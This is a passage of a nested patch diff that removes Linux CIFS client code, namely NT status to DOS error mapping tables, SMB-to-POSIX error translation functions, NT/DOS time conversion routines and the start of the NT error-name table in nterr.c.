+-	ERRHRD, ERRgeneral, NT_STATUS_BACKUP_CONTROLLER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOG_FILE_FULL}, {
+-	ERRDOS, 19, NT_STATUS_TOO_LATE}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_NO_TRUST_LSA_SECRET},
+-/*	{ This NT error code was 'sqashed'
+-	 from NT_STATUS_NO_TRUST_SAM_ACCOUNT to
+-	 NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE during the session setup } */
+-	{
+-	ERRDOS, ERRnoaccess, NT_STATUS_NO_TRUST_SAM_ACCOUNT}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_TRUSTED_DOMAIN_FAILURE}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_FILE_CORRUPT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_CANT_START}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_TRUST_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MUTANT_LIMIT_EXCEEDED}, {
+-	ERRDOS, ERRnetlogonNotStarted, NT_STATUS_NETLOGON_NOT_STARTED}, {
+-	ERRSRV, ERRaccountexpired, NT_STATUS_ACCOUNT_EXPIRED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_POSSIBLE_DEADLOCK}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NETWORK_CREDENTIAL_CONFLICT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REMOTE_SESSION_LIMIT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_FILE_CHANGED}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT},
+-/*	{ This NT error code was 'sqashed'
+-	 from NT_STATUS_DOMAIN_TRUST_INCONSISTENT to NT_STATUS_LOGON_FAILURE
+-	 during the session setup }  */
+-	{
+-	ERRDOS, ERRnoaccess, NT_STATUS_DOMAIN_TRUST_INCONSISTENT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FS_DRIVER_REQUIRED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_USER_SESSION_KEY}, {
+-	ERRDOS, 59, NT_STATUS_USER_SESSION_DELETED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_LANG_NOT_FOUND}, {
+-	ERRDOS, ERRnoresource, NT_STATUS_INSUFF_SERVER_RESOURCES}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_BUFFER_SIZE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ADDRESS_COMPONENT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ADDRESS_WILDCARD}, {
+-	ERRDOS, 68, NT_STATUS_TOO_MANY_ADDRESSES}, {
+-	ERRDOS, 52, NT_STATUS_ADDRESS_ALREADY_EXISTS}, {
+-	ERRDOS, 64, NT_STATUS_ADDRESS_CLOSED}, {
+-	ERRDOS, 64, NT_STATUS_CONNECTION_DISCONNECTED}, {
+-	ERRDOS, 64, NT_STATUS_CONNECTION_RESET}, {
+-	ERRDOS, 68, NT_STATUS_TOO_MANY_NODES}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_ABORTED}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_TIMED_OUT}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_NO_RELEASE}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_NO_MATCH}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_RESPONDED}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_INVALID_ID}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_INVALID_TYPE}, {
+-	ERRDOS, ERRunsup, NT_STATUS_NOT_SERVER_SESSION}, {
+-	ERRDOS, ERRunsup, NT_STATUS_NOT_CLIENT_SESSION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANNOT_LOAD_REGISTRY_FILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DEBUG_ATTACH_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SYSTEM_PROCESS_TERMINATED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DATA_NOT_ACCEPTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_BROWSER_SERVERS_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_VDM_HARD_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DRIVER_CANCEL_TIMEOUT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REPLY_MESSAGE_MISMATCH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MAPPED_ALIGNMENT}, {
+-	ERRDOS, 193, NT_STATUS_IMAGE_CHECKSUM_MISMATCH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOST_WRITEBEHIND_DATA}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID}, {
+-	ERRSRV, ERRpasswordExpired, NT_STATUS_PASSWORD_MUST_CHANGE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NOT_TINY_STREAM}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RECOVERY_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_STACK_OVERFLOW_READ}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FAIL_CHECK}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DUPLICATE_OBJECTID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_OBJECTID_EXISTS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONVERT_TO_LARGE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RETRY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FOUND_OUT_OF_SCOPE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ALLOCATE_BUCKET}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PROPSET_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MARSHALL_OVERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_VARIANT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_ACCOUNT_LOCKED_OUT}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_HANDLE_NOT_CLOSABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_REFUSED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_GRACEFUL_DISCONNECT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ADDRESS_ALREADY_ASSOCIATED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ADDRESS_NOT_ASSOCIATED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_INVALID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_ACTIVE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NETWORK_UNREACHABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_HOST_UNREACHABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PROTOCOL_UNREACHABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PORT_UNREACHABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REQUEST_ABORTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_ABORTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_COMPRESSION_BUFFER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_USER_MAPPED_FILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_AUDIT_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TIMER_RESOLUTION_NOT_SET}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_COUNT_LIMIT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGIN_TIME_RESTRICTION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGIN_WKSTA_RESTRICTION}, {
+-	ERRDOS, 193, NT_STATUS_IMAGE_MP_UP_MISMATCH}, {
+-	ERRHRD, ERRgeneral, 0xc000024a}, {
+-	ERRHRD, ERRgeneral, 0xc000024b}, {
+-	ERRHRD, ERRgeneral, 0xc000024c}, {
+-	ERRHRD, ERRgeneral, 0xc000024d}, {
+-	ERRHRD, ERRgeneral, 0xc000024e}, {
+-	ERRHRD, ERRgeneral, 0xc000024f}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INSUFFICIENT_LOGON_INFO}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_DLL_ENTRYPOINT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_SERVICE_ENTRYPOINT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LPC_REPLY_LOST}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IP_ADDRESS_CONFLICT1}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IP_ADDRESS_CONFLICT2}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_QUOTA_LIMIT}, {
+-	ERRSRV, 3, NT_STATUS_PATH_NOT_COVERED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_CALLBACK_ACTIVE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LICENSE_QUOTA_EXCEEDED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PWD_TOO_SHORT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PWD_TOO_RECENT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PWD_HISTORY_CONFLICT}, {
+-	ERRHRD, ERRgeneral, 0xc000025d}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PLUGPLAY_NO_DEVICE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNSUPPORTED_COMPRESSION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_HW_PROFILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH}, {
+-	ERRDOS, 182, NT_STATUS_DRIVER_ORDINAL_NOT_FOUND}, {
+-	ERRDOS, 127, NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND}, {
+-	ERRDOS, 288, NT_STATUS_RESOURCE_NOT_OWNED}, {
+-	ERRDOS, ErrTooManyLinks, NT_STATUS_TOO_MANY_LINKS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_QUOTA_LIST_INCONSISTENT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FILE_IS_OFFLINE}, {
+-	ERRDOS, 21, 0xc000026e}, {
+-	ERRDOS, 161, 0xc0000281}, {
+-	ERRDOS, ERRnoaccess, 0xc000028a}, {
+-	ERRDOS, ERRnoaccess, 0xc000028b}, {
+-	ERRHRD, ERRgeneral, 0xc000028c}, {
+-	ERRDOS, ERRnoaccess, 0xc000028d}, {
+-	ERRDOS, ERRnoaccess, 0xc000028e}, {
+-	ERRDOS, ERRnoaccess, 0xc000028f}, {
+-	ERRDOS, ERRnoaccess, 0xc0000290}, {
+-	ERRDOS, ERRbadfunc, 0xc000029c}, {
+-	ERRDOS, ERRsymlink, NT_STATUS_STOPPED_ON_SYMLINK}, {
+-	ERRDOS, ERRinvlevel, 0x007c0001}, {
+-	0, 0, 0 }
+-};
+-
+-/*****************************************************************************
+- Print an error message from the status code
+- *****************************************************************************/
+-static void
+-cifs_print_status(__u32 status_code)
+-{
+-	int idx = 0;
+-
+-	while (nt_errs[idx].nt_errstr != NULL) {
+-		if (((nt_errs[idx].nt_errcode) & 0xFFFFFF) ==
+-		    (status_code & 0xFFFFFF)) {
+-			pr_notice("Status code returned 0x%08x %s\n",
+-				  status_code, nt_errs[idx].nt_errstr);
+-		}
+-		idx++;
+-	}
+-	return;
+-}
+-
+-
+-static void
+-ntstatus_to_dos(__u32 ntstatus, __u8 *eclass, __u16 *ecode)
+-{
+-	int i;
+-	if (ntstatus == 0) {
+-		*eclass = 0;
+-		*ecode = 0;
+-		return;
+-	}
+-	for (i = 0; ntstatus_to_dos_map[i].ntstatus; i++) {
+-		if (ntstatus == ntstatus_to_dos_map[i].ntstatus) {
+-			*eclass = ntstatus_to_dos_map[i].dos_class;
+-			*ecode = ntstatus_to_dos_map[i].dos_code;
+-			return;
+-		}
+-	}
+-	*eclass = ERRHRD;
+-	*ecode = ERRgeneral;
+-}
+-
+-int
+-map_smb_to_linux_error(char *buf, bool logErr)
+-{
+-	struct smb_hdr *smb = (struct smb_hdr *)buf;
+-	unsigned int i;
+-	int rc = -EIO;	/* if transport error smb error may not be set */
+-	__u8 smberrclass;
+-	__u16 smberrcode;
+-
+-	/* BB if NT Status codes - map NT BB */
+-
+-	/* old style smb error codes */
+-	if (smb->Status.CifsError == 0)
+-		return 0;
+-
+-	if (smb->Flags2 & SMBFLG2_ERR_STATUS) {
+-		/* translate the newer STATUS codes to old style SMB errors
+-		 * and then to POSIX errors */
+-		__u32 err = le32_to_cpu(smb->Status.CifsError);
+-		if (logErr && (err != (NT_STATUS_MORE_PROCESSING_REQUIRED)))
+-			cifs_print_status(err);
+-		else if (cifsFYI & CIFS_RC)
+-			cifs_print_status(err);
+-		ntstatus_to_dos(err, &smberrclass, &smberrcode);
+-	} else {
+-		smberrclass = smb->Status.DosError.ErrorClass;
+-		smberrcode = le16_to_cpu(smb->Status.DosError.Error);
+-	}
+-
+-	/* old style errors */
+-
+-	/* DOS class smb error codes - map DOS */
+-	if (smberrclass == ERRDOS) {
+-		/* 1 byte field no need to byte reverse */
+-		for (i = 0;
+-		     i <
+-		     sizeof(mapping_table_ERRDOS) /
+-		     sizeof(struct smb_to_posix_error); i++) {
+-			if (mapping_table_ERRDOS[i].smb_err == 0)
+-				break;
+-			else if (mapping_table_ERRDOS[i].smb_err ==
+-								smberrcode) {
+-				rc = mapping_table_ERRDOS[i].posix_code;
+-				break;
+-			}
+-			/* else try next error mapping one to see if match */
+-		}
+-	} else if (smberrclass == ERRSRV) {
+-		/* server class of error codes */
+-		for (i = 0;
+-		     i <
+-		     sizeof(mapping_table_ERRSRV) /
+-		     sizeof(struct smb_to_posix_error); i++) {
+-			if (mapping_table_ERRSRV[i].smb_err == 0)
+-				break;
+-			else if (mapping_table_ERRSRV[i].smb_err ==
+-								smberrcode) {
+-				rc = mapping_table_ERRSRV[i].posix_code;
+-				break;
+-			}
+-			/* else try next error mapping to see if match */
+-		}
+-	}
+-	/* else ERRHRD class errors or junk  - return EIO */
+-
+-	cifs_dbg(FYI, "Mapping smb error code 0x%x to POSIX err %d\n",
+-		 le32_to_cpu(smb->Status.CifsError), rc);
+-
+-	/* generic corrective action e.g. reconnect SMB session on
+-	 * ERRbaduid could be added */
+-
+-	return rc;
+-}
+-
+-int
+-map_and_check_smb_error(struct mid_q_entry *mid, bool logErr)
+-{
+-	int rc;
+-	struct smb_hdr *smb = (struct smb_hdr *)mid->resp_buf;
+-
+-	rc = map_smb_to_linux_error((char *)smb, logErr);
+-	if (rc == -EACCES && !(smb->Flags2 & SMBFLG2_ERR_STATUS)) {
+-		/* possible ERRBaduid */
+-		__u8 class = smb->Status.DosError.ErrorClass;
+-		__u16 code = le16_to_cpu(smb->Status.DosError.Error);
+-
+-		/* switch can be used to handle different errors */
+-		if (class == ERRSRV && code == ERRbaduid) {
+-			cifs_dbg(FYI, "Server returned 0x%x, reconnecting session...\n",
+-				code);
+-			cifs_signal_cifsd_for_reconnect(mid->server, false);
+-		}
+-	}
+-
+-	return rc;
+-}
+-
+-
+-/*
+- * calculate the size of the SMB message based on the fixed header
+- * portion, the number of word parameters and the data portion of the message
+- */
+-unsigned int
+-smbCalcSize(void *buf)
+-{
+-	struct smb_hdr *ptr = buf;
+-	return (sizeof(struct smb_hdr) + (2 * ptr->WordCount) +
+-		2 /* size of the bcc field */ + get_bcc(ptr));
+-}
+-
+-/* The following are taken from fs/ntfs/util.c */
+-
+-#define NTFS_TIME_OFFSET ((u64)(369*365 + 89) * 24 * 3600 * 10000000)
+-
+-/*
+- * Convert the NT UTC (based 1601-01-01, in hundred nanosecond units)
+- * into Unix UTC (based 1970-01-01, in seconds).
+- */
+-struct timespec64
+-cifs_NTtimeToUnix(__le64 ntutc)
+-{
+-	struct timespec64 ts;
+-	/* BB what about the timezone? BB */
+-
+-	/* Subtract the NTFS time offset, then convert to 1s intervals. */
+-	s64 t = le64_to_cpu(ntutc) - NTFS_TIME_OFFSET;
+-	u64 abs_t;
+-
+-	/*
+-	 * Unfortunately can not use normal 64 bit division on 32 bit arch, but
+-	 * the alternative, do_div, does not work with negative numbers so have
+-	 * to special case them
+-	 */
+-	if (t < 0) {
+-		abs_t = -t;
+-		ts.tv_nsec = (time64_t)(do_div(abs_t, 10000000) * 100);
+-		ts.tv_nsec = -ts.tv_nsec;
+-		ts.tv_sec = -abs_t;
+-	} else {
+-		abs_t = t;
+-		ts.tv_nsec = (time64_t)do_div(abs_t, 10000000) * 100;
+-		ts.tv_sec = abs_t;
+-	}
+-
+-	return ts;
+-}
+-
+-/* Convert the Unix UTC into NT UTC. */
+-u64
+-cifs_UnixTimeToNT(struct timespec64 t)
+-{
+-	/* Convert to 100ns intervals and then add the NTFS time offset. */
+-	return (u64) t.tv_sec * 10000000 + t.tv_nsec/100 + NTFS_TIME_OFFSET;
+-}
+-
+-static const int total_days_of_prev_months[] = {
+-	0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334
+-};
+-
+-struct timespec64 cnvrtDosUnixTm(__le16 le_date, __le16 le_time, int offset)
+-{
+-	struct timespec64 ts;
+-	time64_t sec, days;
+-	int min, day, month, year;
+-	u16 date = le16_to_cpu(le_date);
+-	u16 time = le16_to_cpu(le_time);
+-	SMB_TIME *st = (SMB_TIME *)&time;
+-	SMB_DATE *sd = (SMB_DATE *)&date;
+-
+-	cifs_dbg(FYI, "date %d time %d\n", date, time);
+-
+-	sec = 2 * st->TwoSeconds;
+-	min = st->Minutes;
+-	if ((sec > 59) || (min > 59))
+-		cifs_dbg(VFS, "Invalid time min %d sec %lld\n", min, sec);
+-	sec += (min * 60);
+-	sec += 60 * 60 * st->Hours;
+-	if (st->Hours > 24)
+-		cifs_dbg(VFS, "Invalid hours %d\n", st->Hours);
+-	day = sd->Day;
+-	month = sd->Month;
+-	if (day < 1 || day > 31 || month < 1 || month > 12) {
+-		cifs_dbg(VFS, "Invalid date, month %d day: %d\n", month, day);
+-		day = clamp(day, 1, 31);
+-		month = clamp(month, 1, 12);
+-	}
+-	month -= 1;
+-	days = day + total_days_of_prev_months[month];
+-	days += 3652; /* account for difference in days between 1980 and 1970 */
+-	year = sd->Year;
+-	days += year * 365;
+-	days += (year/4); /* leap year */
+-	/* generalized leap year calculation is more complex, ie no leap year
+-	for years/100 except for years/400, but since the maximum number for DOS
+-	 year is 2**7, the last year is 1980+127, which means we need only
+-	 consider 2 special case years, ie the years 2000 and 2100, and only
+-	 adjust for the lack of leap year for the year 2100, as 2000 was a
+-	 leap year (divisable by 400) */
+-	if (year >= 120)  /* the year 2100 */
+-		days = days - 1;  /* do not count leap year for the year 2100 */
+-
+-	/* adjust for leap year where we are still before leap day */
+-	if (year != 120)
+-		days -= ((year & 0x03) == 0) && (month < 2 ? 1 : 0);
+-	sec += 24 * 60 * 60 * days;
+-
+-	ts.tv_sec = sec + offset;
+-
+-	/* cifs_dbg(FYI, "sec after cnvrt dos to unix time %d\n",sec); */
+-
+-	ts.tv_nsec = 0;
+-	return ts;
+-}
+diff --git a/fs/cifs/nterr.c b/fs/cifs/nterr.c
+deleted file mode 100644
+index 358a766375b4a..0000000000000
+--- a/fs/cifs/nterr.c
++++ /dev/null
+@@ -1,674 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *  Unix SMB/Netbios implementation.
+- *  Version 1.9.
+- *  RPC Pipe client / server routines
+- *  Copyright (C) Luke Kenneth Casson Leighton 1997-2001.
+- */
+-
+-/* NT error codes - see nterr.h */
+-#include <linux/types.h>
+-#include <linux/fs.h>
+-#include "nterr.h"
+-
+-const struct nt_err_code_struct nt_errs[] = {
+-	{"NT_STATUS_OK", NT_STATUS_OK},
+-	{"NT_STATUS_UNSUCCESSFUL", NT_STATUS_UNSUCCESSFUL},
+-	{"NT_STATUS_NOT_IMPLEMENTED", NT_STATUS_NOT_IMPLEMENTED},
+-	{"NT_STATUS_INVALID_INFO_CLASS", NT_STATUS_INVALID_INFO_CLASS},
+-	{"NT_STATUS_INFO_LENGTH_MISMATCH", NT_STATUS_INFO_LENGTH_MISMATCH},
+-	{"NT_STATUS_ACCESS_VIOLATION", NT_STATUS_ACCESS_VIOLATION},
+-	{"NT_STATUS_BUFFER_OVERFLOW", NT_STATUS_BUFFER_OVERFLOW},
+-	{"NT_STATUS_IN_PAGE_ERROR", NT_STATUS_IN_PAGE_ERROR},
+-	{"NT_STATUS_PAGEFILE_QUOTA", NT_STATUS_PAGEFILE_QUOTA},
+-	{"NT_STATUS_INVALID_HANDLE", NT_STATUS_INVALID_HANDLE},
+-	{"NT_STATUS_BAD_INITIAL_STACK", NT_STATUS_BAD_INITIAL_STACK},
+-	{"NT_STATUS_BAD_INITIAL_PC", NT_STATUS_BAD_INITIAL_PC},
+-	{"NT_STATUS_INVALID_CID", NT_STATUS_INVALID_CID},
+-	{"NT_STATUS_TIMER_NOT_CANCELED", NT_STATUS_TIMER_NOT_CANCELED},
+-	{"NT_STATUS_INVALID_PARAMETER", NT_STATUS_INVALID_PARAMETER},
+-	{"NT_STATUS_NO_SUCH_DEVICE", NT_STATUS_NO_SUCH_DEVICE},
+-	{"NT_STATUS_NO_SUCH_FILE", NT_STATUS_NO_SUCH_FILE},
+-	{"NT_STATUS_INVALID_DEVICE_REQUEST",
+-	 NT_STATUS_INVALID_DEVICE_REQUEST},
+-	{"NT_STATUS_END_OF_FILE", NT_STATUS_END_OF_FILE},
+-	{"NT_STATUS_WRONG_VOLUME", NT_STATUS_WRONG_VOLUME},
+-	{"NT_STATUS_NO_MEDIA_IN_DEVICE", NT_STATUS_NO_MEDIA_IN_DEVICE},
+-	{"NT_STATUS_UNRECOGNIZED_MEDIA", NT_STATUS_UNRECOGNIZED_MEDIA},
+-	{"NT_STATUS_NONEXISTENT_SECTOR", NT_STATUS_NONEXISTENT_SECTOR},
+-	{"NT_STATUS_MORE_PROCESSING_REQUIRED",
+-	 NT_STATUS_MORE_PROCESSING_REQUIRED},
+-	{"NT_STATUS_NO_MEMORY", NT_STATUS_NO_MEMORY},
+-	{"NT_STATUS_CONFLICTING_ADDRESSES",
+-	 NT_STATUS_CONFLICTING_ADDRESSES},
+-	{"NT_STATUS_NOT_MAPPED_VIEW", NT_STATUS_NOT_MAPPED_VIEW},
+-	{"NT_STATUS_UNABLE_TO_FREE_VM", NT_STATUS_UNABLE_TO_FREE_VM},
+-	{"NT_STATUS_UNABLE_TO_DELETE_SECTION",
+-	 NT_STATUS_UNABLE_TO_DELETE_SECTION},
+-	{"NT_STATUS_INVALID_SYSTEM_SERVICE",
+-	 NT_STATUS_INVALID_SYSTEM_SERVICE},
+-	{"NT_STATUS_ILLEGAL_INSTRUCTION", NT_STATUS_ILLEGAL_INSTRUCTION},
+-	{"NT_STATUS_INVALID_LOCK_SEQUENCE",
+-	 NT_STATUS_INVALID_LOCK_SEQUENCE},
+-	{"NT_STATUS_INVALID_VIEW_SIZE", NT_STATUS_INVALID_VIEW_SIZE},
+-	{"NT_STATUS_INVALID_FILE_FOR_SECTION",
+-	 NT_STATUS_INVALID_FILE_FOR_SECTION},
+-	{"NT_STATUS_ALREADY_COMMITTED", NT_STATUS_ALREADY_COMMITTED},
+-	{"NT_STATUS_ACCESS_DENIED", NT_STATUS_ACCESS_DENIED},
+-	{"NT_STATUS_BUFFER_TOO_SMALL", NT_STATUS_BUFFER_TOO_SMALL},
+-	{"NT_STATUS_OBJECT_TYPE_MISMATCH", NT_STATUS_OBJECT_TYPE_MISMATCH},
+-	{"NT_STATUS_NONCONTINUABLE_EXCEPTION",
+-	 NT_STATUS_NONCONTINUABLE_EXCEPTION},
+-	{"NT_STATUS_INVALID_DISPOSITION", NT_STATUS_INVALID_DISPOSITION},
+-	{"NT_STATUS_UNWIND", NT_STATUS_UNWIND},
+-	{"NT_STATUS_BAD_STACK", NT_STATUS_BAD_STACK},
+-	{"NT_STATUS_INVALID_UNWIND_TARGET",
+-	 NT_STATUS_INVALID_UNWIND_TARGET},
+-	{"NT_STATUS_NOT_LOCKED", NT_STATUS_NOT_LOCKED},
+-	{"NT_STATUS_PARITY_ERROR", NT_STATUS_PARITY_ERROR},
+-	{"NT_STATUS_UNABLE_TO_DECOMMIT_VM",
+-	 NT_STATUS_UNABLE_TO_DECOMMIT_VM},
+-	{"NT_STATUS_NOT_COMMITTED", NT_STATUS_NOT_COMMITTED},
+-	{"NT_STATUS_INVALID_PORT_ATTRIBUTES",
+-	 NT_STATUS_INVALID_PORT_ATTRIBUTES},
+-	{"NT_STATUS_PORT_MESSAGE_TOO_LONG",
+-	 NT_STATUS_PORT_MESSAGE_TOO_LONG},
+-	{"NT_STATUS_INVALID_PARAMETER_MIX",
+-	 NT_STATUS_INVALID_PARAMETER_MIX},
+-	{"NT_STATUS_INVALID_QUOTA_LOWER", NT_STATUS_INVALID_QUOTA_LOWER},
+-	{"NT_STATUS_DISK_CORRUPT_ERROR", NT_STATUS_DISK_CORRUPT_ERROR},
+-	{"NT_STATUS_OBJECT_NAME_INVALID", NT_STATUS_OBJECT_NAME_INVALID},
+-	{"NT_STATUS_OBJECT_NAME_NOT_FOUND",
+-	 NT_STATUS_OBJECT_NAME_NOT_FOUND},
+-	{"NT_STATUS_OBJECT_NAME_COLLISION",
+-	 NT_STATUS_OBJECT_NAME_COLLISION},
+-	{"NT_STATUS_HANDLE_NOT_WAITABLE", NT_STATUS_HANDLE_NOT_WAITABLE},
+-	{"NT_STATUS_PORT_DISCONNECTED", NT_STATUS_PORT_DISCONNECTED},
+-	{"NT_STATUS_DEVICE_ALREADY_ATTACHED",
+-	 NT_STATUS_DEVICE_ALREADY_ATTACHED},
+-	{"NT_STATUS_OBJECT_PATH_INVALID", NT_STATUS_OBJECT_PATH_INVALID},
+-	{"NT_STATUS_OBJECT_PATH_NOT_FOUND",
+-	 NT_STATUS_OBJECT_PATH_NOT_FOUND},
+-	{"NT_STATUS_OBJECT_PATH_SYNTAX_BAD",
+-	 NT_STATUS_OBJECT_PATH_SYNTAX_BAD},
+-	{"NT_STATUS_DATA_OVERRUN", NT_STATUS_DATA_OVERRUN},
+-	{"NT_STATUS_DATA_LATE_ERROR", NT_STATUS_DATA_LATE_ERROR},
+-	{"NT_STATUS_DATA_ERROR", NT_STATUS_DATA_ERROR},
+-	{"NT_STATUS_CRC_ERROR", NT_STATUS_CRC_ERROR},
+-	{"NT_STATUS_SECTION_TOO_BIG", NT_STATUS_SECTION_TOO_BIG},
+-	{"NT_STATUS_PORT_CONNECTION_REFUSED",
+-	 NT_STATUS_PORT_CONNECTION_REFUSED},
+-	{"NT_STATUS_INVALID_PORT_HANDLE", NT_STATUS_INVALID_PORT_HANDLE},
+-	{"NT_STATUS_SHARING_VIOLATION", NT_STATUS_SHARING_VIOLATION},
+-	{"NT_STATUS_QUOTA_EXCEEDED", NT_STATUS_QUOTA_EXCEEDED},
+-	{"NT_STATUS_INVALID_PAGE_PROTECTION",
+-	 NT_STATUS_INVALID_PAGE_PROTECTION},
+-	{"NT_STATUS_MUTANT_NOT_OWNED", NT_STATUS_MUTANT_NOT_OWNED},
+-	{"NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED",
+-	 NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED},
+-	{"NT_STATUS_PORT_ALREADY_SET", NT_STATUS_PORT_ALREADY_SET},
+-	{"NT_STATUS_SECTION_NOT_IMAGE", NT_STATUS_SECTION_NOT_IMAGE},
+-	{"NT_STATUS_SUSPEND_COUNT_EXCEEDED",
+-	 NT_STATUS_SUSPEND_COUNT_EXCEEDED},
+-	{"NT_STATUS_THREAD_IS_TERMINATING",
+-	 NT_STATUS_THREAD_IS_TERMINATING},
+-	{"NT_STATUS_BAD_WORKING_SET_LIMIT",
+-	 NT_STATUS_BAD_WORKING_SET_LIMIT},
+-	{"NT_STATUS_INCOMPATIBLE_FILE_MAP",
+-	 NT_STATUS_INCOMPATIBLE_FILE_MAP},
+-	{"NT_STATUS_SECTION_PROTECTION", NT_STATUS_SECTION_PROTECTION},
+-	{"NT_STATUS_EAS_NOT_SUPPORTED", NT_STATUS_EAS_NOT_SUPPORTED},
+-	{"NT_STATUS_EA_TOO_LARGE", NT_STATUS_EA_TOO_LARGE},
+-	{"NT_STATUS_NONEXISTENT_EA_ENTRY", NT_STATUS_NONEXISTENT_EA_ENTRY},
+-	{"NT_STATUS_NO_EAS_ON_FILE", NT_STATUS_NO_EAS_ON_FILE},
+-	{"NT_STATUS_EA_CORRUPT_ERROR", NT_STATUS_EA_CORRUPT_ERROR},
+-	{"NT_STATUS_FILE_LOCK_CONFLICT", NT_STATUS_FILE_LOCK_CONFLICT},
